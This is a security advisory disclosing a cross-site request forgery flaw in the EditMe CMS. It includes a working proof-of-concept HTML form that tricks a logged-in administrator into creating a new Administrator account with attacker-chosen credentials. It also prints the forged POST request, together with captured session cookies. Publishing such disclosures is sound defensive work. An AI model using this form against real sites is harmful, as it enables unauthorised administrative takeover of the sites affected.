Document Title:
===============
EditMe CMS - CSRF Privilege Escalate Web Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1996

Release Date:
=============
2016-11-14

Vulnerability Laboratory ID (VL-ID):
====================================
1996

Common Vulnerability Scoring System:
====================================
2.8

Product & Service Introduction:
===============================
EditMe is a framework that serves as a Platform as a Service to build custom Web Applications, Web Prototyping, and Web CMS.
It is a CMS in which any page can be a server-side script that implements whatever dynamic functionality you dream up. That's EditMe. No FTP servers, compilers or IDEs are required. EditMe's API uses server-side JavaScript and its templates use XML, so there are no new languages to learn.

(Copy of the Vendor Homepage: http://www.editme.com/ )

Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory researcher discovered a CSRF privilege escalation web vulnerability in the official EditMe content management system.

Vulnerability Disclosure Timeline:
==================================
2016-11-14: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A cross site request forgery vulnerability has been discovered in the official EditMe content management system.
The vulnerability allows a remote attacker to make a logged-in victim's browser issue requests to unprotected,
state-changing functions in the victim's own web context.

The account-creation function (/_Register with mode=AdminAdd) accepts a POST that is authenticated by the session
cookie alone and carries no anti-CSRF security token. An attacker who lures a logged-in administrator onto an
attacker-controlled page can therefore forge that request; the application creates a new account in the Administrator
group (user-groupname=A) with attacker-chosen credentials, and the attacker gains administrator privileges without
ever holding an account on the target.

Proof of Concept (PoC):
=======================
The cross site request forgery vulnerability can be exploited by a remote attacker who has no privileged user account on the target.
The only precondition is that an administrator who is logged in to EditMe opens the attacker's page and submits the form below
(the PoC as written uses a visible Save button). The browser attaches the administrator's EditMe session cookies to the cross-site
POST, and because /_Register validates no anti-CSRF token, the request creates the account "VulnerabilityLab" in the Administrator group.
To reproduce, host the page below, submit it while logged in as administrator, and compare the resulting request with the session log that follows.

--- PoC: CSRF Exploitation ---
<html>
<body>
<h2>Privilege Escalate CSRF Vulnerability</h2>
<!-- The victim's session cookie is attached by the browser; /_Register requires no anti-CSRF token -->
<form action="http://localhost/_Register" method="post">
<input name="mode" value="AdminAdd" type="hidden">
<input name="redirect" value="" type="hidden">
<!-- Group "A" is the Administrator group -->
<select name="user-groupname">
<option value="A" selected="">Administrator</option>
</select>
<input name="user-username" value="VulnerabilityLab" type="hidden">
<input name="user-password" value="1234" type="hidden">
<input name="user-password2" value="1234" type="hidden">
<input name="user-email" value="tested@live.fr" type="hidden">
<input class="button" style="font-size:110%" name="regSubmit" value="Save" type="submit">
</form>
</body>
</html>

--- PoC Session Logs [POST] ---
Status: 200 [OK]
Host: pentest.editme.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __utma=164978144.641387690.1478254033.1478262268.1478328738.3; __utmz=164978144.1478328738.3.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); km_lv=x; km_ai=i3E6P9IiO690CMxX353C5RCJAVY%3D; km_uq=; __utma=1.330307796.1478254213.1478254213.1478329355.2; __utmz=1.1478254213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=164978144.3.10.1478328738; __utmc=164978144; JSESSIONID=377D65CA3361D7998A1173C97420C846; visited=" Home 404"; __utmb=1.24.10.1478329355; __utmc=1; __utmt=1; editme-user=admin; editme-key="ECiu7PBk57GYeaLPUxHeDw=="
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
-
POST Method: mode=AdminAdd&redirect=&user-groupname=A&user-username=VulnerabilityLab&user-password=1234&user-password2=1234&user-email=tested%40live.fr&regSubmit=Save

Security Risk:
==============
The security risk of the client-side cross site request forgery web vulnerability in the application is estimated as medium. (CVSS 2.8)

Credits & Authors:
==================
ZwX - (http://zwx.fr/) [http://www.vulnerability-lab.com/show.php?user=ZwX]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team and the specific
authors or managers. To record, list, modify, use or edit our material, contact (admin@ or research@vulnerability-lab.com) to ask for permission.

Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com